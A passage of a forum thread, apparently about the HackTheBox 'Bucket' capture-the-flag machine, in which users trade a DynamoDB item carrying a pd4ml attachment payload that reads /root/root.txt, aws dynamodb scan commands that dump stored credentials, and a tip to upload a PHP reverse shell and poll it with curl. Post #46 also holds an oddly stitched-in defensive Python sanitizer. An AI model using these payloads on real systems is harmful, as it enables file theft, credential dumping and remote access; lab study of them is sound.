TUTORIAL Bucket Discussion
by Ro0ted - October 17, 2020 at 10:37 PM
#37
We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                    "title": {"S": "Ransomware"},
                    "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}
                }
            }
        }
    ]
}

Something like that I try to make it work.
#38
(October 18, 2020 at 08:47 PM)Kali76 Wrote:
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.
I don't understand, how do you make a POST request? With Burp? Where did you get these parameters?


curl -X POST 127.0.0.1:8000 ...
#39
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                    "title": {"S": "Ransomware"},
                    "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}
                }
            }
        }
    ]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(
#40
(October 18, 2020 at 11:10 AM)as12sd12fdg3 Wrote:
(October 18, 2020 at 10:15 AM)VillainD Wrote:
(October 18, 2020 at 10:04 AM)Ro0ted Wrote:
(October 18, 2020 at 09:51 AM)VillainD Wrote: aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ | jq -r .

this will give you those creds

great man, thank you. can you explain to me the steps to find this command?

first list all the tables using

aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/

https://docs.aws.amazon.com/cli/latest/r...l#examples

then I was searching for how to get those table contents, and DynamoDB has a scan option: "The Scan operation returns one or more items and item attributes by accessing every item in a table or a secondary index"

https://docs.aws.amazon.com/cli/latest/r...l#examples

based on the examples I used this command, since we already know the table's name

aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/

and the "--endpoint-url" I got from here

https://stackoverflow.com/questions/6098...ing-tables
got this error
Unable to locate credentials. You can configure credentials by running "aws configure".
but I don't find any credentials

go to http://s3.bucket.htb/shell
you now have something.
use the aws configure command and paste the domain name
#41
(October 18, 2020 at 08:54 PM)southerndarkness Wrote:
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(

I could get a pdf file with a nicely-looking Pin ;-)
But nothing more...
#42
(October 18, 2020 at 09:13 PM)raidmail2020 Wrote:
(October 18, 2020 at 08:54 PM)southerndarkness Wrote:
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(

I could get a pdf file with a nicely-looking Pin ;-)
But nothing more...

Dat PushPin tho
#43
(October 18, 2020 at 09:16 PM)southerndarkness Wrote:
(October 18, 2020 at 09:13 PM)raidmail2020 Wrote:
(October 18, 2020 at 08:54 PM)southerndarkness Wrote:
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(

I could get a pdf file with a nicely-looking Pin ;-)
But nothing more...

Dat PushPin tho
Where can I find the pdf?
#44
(October 18, 2020 at 09:59 PM)ARhOmOuTEd Wrote:
(October 18, 2020 at 09:16 PM)southerndarkness Wrote:
(October 18, 2020 at 09:13 PM)raidmail2020 Wrote:
(October 18, 2020 at 08:54 PM)southerndarkness Wrote:
(October 18, 2020 at 07:25 PM)xxxyz Wrote: We need to trigger POST with :

{
    "alerts": [
        {
            "PutRequest": {
                "Item": {
                        "title": {"S":"Ransomware"} ,
                      "data":{"S":"<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/root.txt</pd4ml:attachment>"}             
                }
            }
        }
    ]
}

Something like that I try to make it work.

Any luck? I tried posting with that but got nothing :(

I could get a pdf file with a nicely-looking Pin ;-)
But nothing more...

Dat PushPin tho
Where can I find the pdf?

I don't know if it contains anything or if it works. The location of where the pdf is saved is in index.php of /var/www/bucket-app
#45
/var/www/bucket-app/index.php <--- head is a target but I don't get it lol
#46
(October 19, 2020 at 02:37 AM)skorld Wrote: /var/www/bucket-app/index.php <--- head is a target but I don't get it lol

index.php L24:
passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
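The pd4ml:attachment payload from post #37 and the passthru() line quoted in #46 are the same problem seen from two sides: untrusted item content reaches the PDF renderer, and a request-controlled file name reaches a shell string. The following is an added example, not code from the thread or from the box: a Python check that rejects alert items carrying renderer markup or file: URIs before rendering, plus an argv-list form of the quoted command (the argument values are copied from the quoted line; the basename restriction, the sample items and the function names are assumptions).

```python
import html
import re
from typing import Dict, List

# Constructed sample items in the DynamoDB PutRequest "Item" shape from the thread.
SAMPLE_ITEMS = [
    {"title": {"S": "Ransomware"},
     "data": {"S": "Encrypts files and demands payment."}},
    {"title": {"S": "Ransomware"},
     "data": {"S": '<pd4ml:attachment description="attached.txt" icon="PushPin">'
                   'file:///root/root.txt</pd4ml:attachment>'}},
    # Entity-encoded variant: the tag is hidden until the text is decoded.
    {"title": {"S": "Phish"},
     "data": {"S": "See &lt;pd4ml:attachment icon=&quot;PushPin&quot;&gt;"
                   "note&lt;/pd4ml:attachment&gt;"}},
]

# Renderer-specific markup and the local URI scheme used in the thread's payload.
_PD4ML_TAG = re.compile(r"<\s*/?\s*pd4ml:", re.IGNORECASE)
_LOCAL_URI = re.compile(r"\bfile\s*:", re.IGNORECASE)


def find_violations(item: Dict[str, Dict[str, str]]) -> List[str]:
    """Return the reasons an item must not be rendered; an empty list means clean."""
    reasons: List[str] = []
    for attr, wrapper in item.items():
        # Decode entities first so an encoded tag cannot slip past the checks.
        text = html.unescape(wrapper.get("S", ""))
        if _PD4ML_TAG.search(text):
            reasons.append(f"{attr}: pd4ml renderer tag")
        if _LOCAL_URI.search(text):
            reasons.append(f"{attr}: local URI scheme")
    return reasons


def sanitize_for_pdf(value: str) -> str:
    """Escape a value so the renderer shows it as text instead of parsing it as markup."""
    return html.escape(html.unescape(value), quote=True)


def render_argv(name: str) -> List[str]:
    """Argv-list form of the quoted passthru() command (hypothetical rewrite).

    The file name is limited to a plain basename, so it can neither leave the
    files/ directory nor alter the command, which a string handed to
    passthru() cannot guarantee.
    """
    if name.startswith(".") or not re.fullmatch(r"[A-Za-z0-9._-]{1,64}", name):
        raise ValueError(f"rejected file name: {name!r}")
    return ["java", "-Xmx512m", "-Djava.awt.headless=true", "-cp", "pd4ml_demo.jar",
            "Pd4Cmd", f"file:///var/www/bucket-app/files/{name}", "800", "A4",
            "-out", "files/result.pdf"]
```

Run find_violations over every item before the scan results are turned into a PDF, and pass render_argv's list to subprocess.run instead of a shell string.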
#47
(October 18, 2020 at 04:37 PM)Kali76 Wrote:
(October 18, 2020 at 04:35 PM)xxxyz Wrote: When you upload your file to the adserver bucket you need to wait for the sync part. When the file in the bucket is out, then you can check on the real server bucket.htb/....php

There is a sync feature you just need to wait and check.

I've been waiting for at least 10 minutes but nothing, it doesn't find any of the files I upload

short tip
use a php reverse shell, copy it to a bucket and try to curl it every 2 secs since it takes time to deploy

watch -n2 curl http://bucket.htb/{bucket Name}/{file.php}

do this while listening on a port...

;-)
#48
Anyone root yet? Still have no idea :(
